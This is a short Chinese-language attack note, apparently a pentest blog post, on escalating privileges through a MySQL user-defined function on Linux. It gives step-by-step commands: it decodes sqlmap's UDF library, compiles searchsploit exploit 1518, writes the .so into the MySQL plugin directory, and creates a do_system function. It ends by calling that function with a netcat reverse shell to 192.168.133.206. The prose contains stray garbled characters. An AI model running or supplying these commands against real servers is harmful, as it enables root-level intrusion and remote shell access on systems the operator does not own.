select @@global.secure_file_priv;
查看MySQL服務(wù)器的文件讀寫權(quán)限
如果是NULL就是完全禁止
udf提權(quán)用到的so文件(linux)在kali下默認(rèn)集成谈息,路徑為/usr/share/sqlmap/udf/mysql/linux/64(32)
還有一個(gè)需要注意的是燕少,sqlmap里的udf.dll是通過異或編碼的势决,使用之前一定要記得解碼,解碼的工具也在sqlmap中,路徑為
/usr/share/sqlmap/extra/cloak解密之后會(huì)在so目錄下生成so文件需要?jiǎng)?chuàng)建udf中存在的函數(shù)才可以从隆,可以用十六進(jìn)制編輯器打開udf.so看一下
圖片.png
或者searchsploit mysql udf
圖片.png
把對應(yīng)的內(nèi)容編譯出來
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
mysql創(chuàng)建函數(shù)命令
use mysql;
show variables like '%plugin%';
create table udf1(line blob);
insert into udf1 values(load_file('/tmp/udf.so'));
select * from udf1 into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select * from mysql.func; #查詢是否創(chuàng)建函數(shù)成功
select do_system('nc 192.168.133.206 9999 -e /bin/bash');
